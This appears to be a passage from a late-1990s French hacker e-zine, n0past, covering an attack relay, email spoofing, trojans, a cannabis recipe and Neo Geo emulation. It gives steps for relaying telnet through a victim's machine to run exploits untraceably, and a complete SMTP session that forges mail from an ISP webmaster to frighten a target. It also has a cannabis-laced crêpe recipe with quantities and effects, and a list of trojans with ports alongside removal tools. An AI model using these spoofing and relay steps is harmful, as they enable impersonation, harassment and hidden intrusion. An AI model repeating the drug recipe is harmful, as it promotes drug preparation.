Tu dois savoir seulement que la liaison dépendera de la ligne de ta victime car elle est l'intermédiaire.

Toi <-----> Victime <-----> server

________________________________
> sp00feR sUr uNe sTaTi0n UNIX <
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\_______________________________________________________________

1) tu ecris l'ip de la station unix. ex: 193.252.202.20
4) En dessous, tu écris le port du serveur: 23 ApprEnd a c0mPteR
5) Tu appuies sur OK. nAnArD :)
6) Tu lances telnet ++nk
7) Tu appuies sur "connecter" / "systeme distant" et t'ecris dans l'hote : 127.0.0.1
8) Ca y'est, t'es connecté avec l'IP de ta victime.
9) tu peux maintenant executer tes exploits sans qu'on puisse te retrouver. :o)
_________________________________________________________________________________________________

Maintenant a vous de faire marcher votre imagination et de trouver de nouvelles utilités.
Je vous conseille de faire des tests chez vous avant (en réseau par exemple, c'est pratique).
Si vous avez des suggestions et des idées, envoyez nous un mail:

LorD NanarD


_ _________________________________ _
`^°*;:,.> mAiL pAr TeLnEt ...An0nYm0uS <.,:;*°^`
___________________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\__________________________________
VI



.,:;> INTRO <;:,.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯



Un mec te fais chier et ta son e-mail. Tu veux lui faire une blague en te faisant passer pour
quelqu'un d'autre?
.,:;> eXeMpLe <;:,.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

Ton pote se crois le maitre des Hackers car il utilise le socket 2.3 . Tu veux lui foutre les boules?
Rien de plus simple: tu lui envoies un mail de la part du webmaster de son provider :o)



1) Tu lances TELNET. Pour les Neuneus: DEMARRER/ EXECUTER / telnet
2) Tu appuies sur "connecter" / "systeme distant"
3) Dans "hote" tu ecris le server SMTP. ex: smtp.wanadoo.fr
4) Ensuite le port: 25
tu ecris dans la fenetre:

HELO wanadoo.fr
mail from:webmaster@wanadoo.fr
rcpt to:victime@wanadoo.fr
data
Monsieur,
Nous avons détecter des activités illicites en provenance de votre compte.
Certains clients se sont plaints d'avoir été piraté et veulent entamer
une action judiciaire sur votre personne. Cependant nous voudriont éviter le
recours de la police. C'est pourquoi, je vous invite a arreter toutes intrusions
distantes. Votre compte sera suspendu pendant un mois en guise d'avertissement.

Antoine Fortin, Webmaster
.
quit



Voila un exemple qui devrait redescendre sur terre plus d'un newbie :o)
Vous trouverez un programmes BATCH qui automatise la tache.
Il suffit de l'éditer et de remplacer les entrées mises par default.

Nom du fichier: mail.bat


_ _______________________________________________ _
`^°*;:,.> Être ou ne plus être, là est la question... <.,:;*°^`
______________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\_______________________________
VI


De nos jours, le NET est rempli de programmes de toute sortes qui visent à le détruire!!!
Notre Internet est rendu une Cyber-Poubelle… En passant par les Nukes, les Lands, les Boinks
jusqu’aux fameux Trojan....
Plusieurs personnes inconscientes du fait d’utiliser de tels programme peuvent causer des
dommages considérables à des personnes innocentes !!!
C’est ce que nous appelons communément les lamerz… C’est personnes détruisent notre NET sans
le savoir… J’ai donc décidé d’écrire un article sur la protection contre les Trojans....

Voici les programmes de type chevaux de Troie les plus connus et les plus communs :

+> Sockets de Troie et tout ses dérivés (Sockets23, Sockets 2.X, etc.) :
Accède un ordinateur infecté par un programme donnant la possibilité de s’introduire dans
l’ordinateur de la victime… Possibilité de rebooter, de faire afficher un texte a l’écran, de
faire imprimer un texte sur l’imprimante par défaut, de modifier la Base de Registre et d’avoir
accès au Disque locaux de l’ordinateur exploiter… Port d’accès : 5000 et 30303

+> NetBus 1.53 et 1.6 :
Même chose que le Sockets de Troie… Port d’accès : 12345 et 12346

+> Back Orifice :
Plus de possibilités que le Sockets de Troie… Port d’accès par défaut : 31337

+> Master Paradise et Hacker’s Paradise :
Même chose qu’avec le Sockets de Troie sauf quelques fonctions différentes… Port d’accès : 456

Bref, plusieurs programmes de hack sont sur le marcher… Pour s’en défendre, quelque programmes existes… Voici ceux que je vous préfères :

+> BouffeTroyen :
Ce petit programme créer par Aiki scan votre disque dure et élimine les taupes du Sockets de
Troie, du Sockets23, de NetBus, de Back Orifice, de Hacker’s Paradise, de ICKiller et de
plusieurs autre programmes de hack… Ou le trouver : http://www.mygale.org/~aikick/dans la
section ‘No Hack’…

+> Anti-Sockets23 :
Déloge le Virus du Sockets23… Pas trouvable sur le NET, z’avez qu’a demander a vos amis…

+> SmartGuard :
Programme créer par moi-même qui protège contre les attaques de programmes de hack comme ceux
nommé en haut… Où le trouver : http://www.mygale.org/~backflip/

+> StReVenge :
Protège contre les attaques du Sockets de Troie et reboot ou prend en contrôle l’ordinateur de
celui qui tente de vous hacker sur le port 5000.. Pas possible de le trouver sur le NET, z’avez
qu’a demander a vos amis!!!

+> AntiViral Toolkit Pro :
Anti-Virus qui a les même possibilité que McAfee mais trouve maintenant aussi le Virus du Sockets23…

.....bah aLoRs BacK ....oN fAiT dEs z0ubLis ?! ++nk

+> Socket 23 Keeper :
Protege contre les attaques du socket + possibilité de desinfecter des fichiers.

+> Anti-Virus :
C'est l'anti virus créé par JC a la suite des incidents ki ont U lieux en juin dernier ....

BackFlip
Backflip@iname.com
#n0past Undernet



_ _________________________________ _
`^°*;:,.> d R u G s b Y M i S t 0 <.,:;*°^`
___________________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\__________________________________
VIII
(misto@bigfoot.com)

Après le space yogourt, j'ai décidé de vous révéler l'unique et véritable recette
de la SPACE CRÊPE gardée jalousement, depuis des générations, par un pâtissier hollandais.
Cette recette originale est excellente lors des soirées entre potes, anniversaire...

_____________________________
> Ce qu'il vous faut réunir <
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\_________________________________________________________________


- 28 dl de lait
- 80 grammes de farine tamisée
- 1 Oeuf (frais)
- 2 cuillères a soupe d'huile
- un Shaker et une poêle
- 5 grammes de résine de cannabis

_______________
> La recette <
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\________________________________________________________________________________

Versez dans le shaker le 28 dl de lait, les 80 grammes de farine tamisée,
l'Oeuf (sans oublier d'enlever la coquille :) puis les 2 cuillères à soupe d'huile.
Effriter correctement vos 5 grammes de résine de cannabis dans le shaker. Il est
impératif qu'il n'y est pas de boulettes. Ajoutez 2 pincés de sel.
Fermez, secouez énergiquement puis versez le contenue du shaker dans une grosse poêle.
ATTENTION la crêpe sera très épaisse (c'est normal) donc prévoyait une grosse poêle.
Faites la cuire suffisamment en n'omettant pas de la retourner à mi-cuisson.

_______________
> Dégustation <
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\________________________________________________________________________________

Cette recette est faite pour 3 personnes.
Voilà votre crêpe est prête démoulez la dans une grande assiette et faites 3 parts.
Il vous faut manger votre crêpe le plus rapidement après son démoulage et nature,
accompagné là d'une bière blonde.

__________
> Effets <
/¯¯¯¯¯¯¯¯¯¯\_____________________________________________________________________________________

La monté se fera moins rapidement qu'avec un space yogourt mais les effets seront
tout de même euphorique (crise de rire et j'en passe... ).
La durée approximative du trip est de 3 heures.

Voilà bon Hack et bonne défonce après...


_ _________________________________ _
`^°*;:,.> iNtRoDuCti0n a L'ëmULaTi0n <.,:;*°^`
___________________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\__________________________________
IX


.,:;> INTRO <;:,.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

Ehehehehee !!!!!!!!!! Enfin mon tour :)
Bon mon rôle est de vous parler un peu de l'émulation.
Vous me direz "c'est quoi l'émulation ?!" Alors bande de jeunes inconscients (bruit de scie...),
je vais expliquer en gros ce que c'est ! Vous avez un PC non ? (Si surement, sinon vous ne serez
pas en train de lire ce E-zines... :p ) Et vous aviez un ordinateur ou une console...
Ca vous diriez de rejouer a vos anciens jeux qui vous avez faits rever !
Et bien c'est possible !!!!!!!!!!*
"Comment" me diriez vous ? Avec un émulateur !!!!!!!!!!!!! Non pas possible !!!!!!!! Et si !!!!!
Alors vous pouvez pratiquement tout emuler a conditions de savoir le code source du micro ou
de la console a emuler !
Qu'est ce que l'on peut trouver comme emulateur ??? Facile et difficile ! Il existe plusieurs
categories d'emulateur :

ARCADE
ORDINATEUR
CONSOLE

ARCADE :
¯¯¯¯¯¯¯¯
l'emulateur le plus connu est sans doute MAME qui emula toutes les bonnes vieilles bornes
d'arcade comme pacman, galaxian et autres supers jeux...
Mais il reste encore qq progres a faire :) Sinon il exite des emulateurs specifiques pour
certains jeux comme MGE qui nous fais revivre les bons moments passe avec la serie des gauntlet ! !
Vous savez ce jeu interminable où l'on incarne un guerrier, elfe, magicien, valkyrie au choix ?
Ah vous vous en souvenez :) Cool :)
Sinon il reste aussi des emulateurs comme Callus dont la specialite est d'emuler les roms CPS1 !
Kesako ? Facile toutes les roms qui CAPCOM comme Final Fight, Strider, Rockman etc....

ORDINATEUR :
¯¯¯¯¯¯¯¯¯¯¯¯
Bien des choses se sont passes avant l'avenement du PC fasse au autres ordinateurs...
Avant l'AMIGA et l'ATARI etaient les maitres du jeux et etaient bcp plus puissant qu'un PC !
On trouvait de tout ! Jeux, Demos, Utiliataires Dessin, Musiques (rappelons que l'amiga etait
le premier ordinateur a avoir une qualite de son extraordinaire ! Mais on peut aller piocher
encore plus loin, Comme l'APPLE II ! Ah quels koies passes avec Karateka ou Tetris...C'etait le
bon vieux temps...

CONSOLE :
¯¯¯¯¯¯¯¯¯
C'est facile on trouve de tout !!!!!!!!!!!! Sauf un emulateur Saturn qui est encore
en developpement. Sinon vous pouvez dors et deja emule sur votre PC une playstation, voire une
NEOGEO avec NEORAGE ! Sinon vous pouvez trouvez des emulateurs pour les 16Bits de SEGA et
Nintendo ainsi que leurs petites soeurs, les 8Bits :)
Et meme des emulateurs LINX (Paix a son ame...) et aussi les premieres consoles tel que l'atari
2600 et meme le Vectrex !!!!!!!!!!!!!


Bon pour ce premier numéro de n0past, je vais vous parler de l'emulateur NEOGEO, c'est à dire
NEORAGE (NEO REAL ARCADE GAME EMULATOR)

____
______/ N \\_____________________
|¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯...
| FICHE TECHNIQUE :
| ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
| NOM : NEO R.A.G.E....
| ¯¯¯¯¯
| CREATEUR : RAGE...
| ¯¯¯¯¯¯¯¯¯¯
| DERNIERE VERSION EN DATE : 0.2D...
| ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
| TYPE EMULATEUR : ARCADE & CONSOLE...
| ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
| EXISTENCE DE ROM : OUI...
| ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ...
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

La 1ere version de NEORAGE (0.0000001) est sorti il y a deja 6 mois et a grandi en fleche.
Deja des sa premiere version, il faisait tourner la totalité des roms dispo sur le web !
Et maintenant, il est en a sa version 0.2d qui supporte toutes les roms sorties !
Et je peux vous dire qu'il y en a plus de 80 disponibles ! Et si :) c'est chaud :)
Surtout que la moyenne de sorti est de 1 a 2 nouvelles roms par semaine :) alors vive le
téléchargement :) Pkoi ? Parce que la plus petite des roms prend 1 mo (ce qui n'est pas bcp) et
la plus grosse prend 26 MO !!! (pour l'instant) alors quelques heures de telechargement ne fais pas de mal :)
Qu'est ce que l'on peut trouver comme rom dessus ? Tous les jeux NEOGEO :) comme Fatal Fury ou
Samourai Showdown et tous les super jjeux qui ont fait le succes de cette console :) (Magician
Lord, Baseball Stars...)
Le point faible de cet emulateur miracle, c'est qu'il n'a pas de son :(
ARGH !!!!!!!!!!!!!!!!!! C'est pas cool :( Mais ne vous inquiétez pas, car les petits gars de
RAGE bossent comme des durs (bref comme nous :) pour nous sortir l'emulateur de la mort qui tue
avec sons !! et sans ralentissements :)
Le plus chaud aussi reste aussi la ram ! Oubliez le lancement de gros jeux sur 16 MO, vous
risqueriez de planter votre becane ou le jeu ne se lancera pas du tout, vous pouvez tenter avec
32 MO mais le kif est a partir de 64 voire 128 MO avec des jeux genre Real Bout Fatal Fury 2
(le tueur des Fatal Fury qui demande 60 mo pour etre lancer ! et plus quand NEORAGE prendra en
charge le son !)
Le clavier est pas genial pour jouer, mieux vaut vous procurer une manette avec 4 boutons *
(essaye de trouver une manette arcade pour retrouver toutes les sensations du jeu !)
En plus , l'emulateur integre un GameGenie pour pouvoir tricher sur vos jeux préférés
(avec le nouveau BIOS made by Kiwi_slt). Bien sur, l'emulateur est entièrement parametrable
(controle au clavier, joypad, type d'affichage, sans ou avec scanlines) sais prendre des photos
d'ecran lors du jeu.... Bref tout ce que fais un emulateur digne de ce nom :)

_______________________
> KeLkeS b0n LiEns... <
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\_________________________________________________________________________

Bref si je vous ai fais bave, vous pouvez trouver plein d'infos sur NEORAGE ici :

http://home5.swipnet.se/~w-50884

Et pour trouver toutes les roms, vous pouvez aller chez daves :)

http://www.davesclassics.com

ou pour avoir les dernières news en matière de roms NEOGEO :

http://hem.passagen.se/ogg

PS : Ah oui, n'oubliez pas de vous procurer DOS4GW.EXE pour lancer l'emulateur :p

Bon au prochain numéro, j'attaque avec l'emulateur CALLUS pour jeux CAPCOM et aussi un vite
apercu de MAME :)
@+ et bonne emul :)

_________________________________________________________________________________________________
¡¢£¤¥ ¦§¨©ª«¬-®¯°±²³´µ·¸¹º»¿øØÞþæ¡¢£¤¥ ¦§¨©ª«¬-®¯°±²³´µ·¸¹º»¿øØÞþæ¡¢£¤¥ ¦§¨©ª«¬¡¢£¤¥ ¦§¨©ª«¬-®¯°±
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
__ _ _ __
|_ || | __ ____ ______ | || _|aLiAs: NaTuRaL KiLLeR / ++nk / LûNâTîK /aLiEn
||| |______ | | \__/| ___/ __ ___ | ||| pLaCe: 0wNeR
||| |\____ \ | | __ | __/ | |/ \ | ||| r0Les: c0nCepTi0n, miSe en oEuvRe, rEdAcTi0n...
_||| |/ __ || |___| || | | _ || |||_ c0nTacTs: UiN: 8629349
|__||_|\______/\_____/|__|\_____\|____|___||_||__| mAiL: NKHC@HoTmaiL.c0m
]|aLiEn|[
_________________________________________________________________________________________________
¡¢£¤¥ ¦§¨©ª«¬­®¯°±²³´µ·¸¹º»¿øØÞþæ¡¢£¤¥ ¦§¨©ª«¬­®¯°±²³´µ·¸¹º»¿øØÞþæ¡¢£¤¥ ¦§¨©ª«¬¡¢£¤¥ ¦§¨©ª«¬­®¯°±
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
-<\________________________/>-
~~ ~~ ~~ ~~ ~~°ºØø¦ ¿<ñØÞÄ$T¯TëÅm>? ¦øغ°~~ ~~ ~~ ~~ ~~ ~~
~~ ~~ ~~ ~~ ~~ ~-</¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\>-~ ~~ ~~ ~~ ~~ ~~
~~ ~~ ~~ ~~ ~~ ~~http://n0past.cjb.net ~~ ~~ ~~ ~~ ~~ ~~ ~~
~~ ~~ ~~ http://n0pAsT.home.ml.org ... http://www.chez.com/n0pAsT ~~ ~~ ~~
~~ ~~ ~~ ~~ n0past@chez.com ....... n0past@altern.org ~~ ~~ ~~ ~~ ~~
~~ ~~ ~~ ~~ ~~ ~~ n0past@hotmail.com~~ ~~ ~~ ~~ ~~ ~~ ~~
~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~
~~ ~~ ~~ ~~ ~~ et bien sûr : #n0pAsT sur uNdErNeT ~~ ~~ ~~ ~~ ~~
~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~

loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT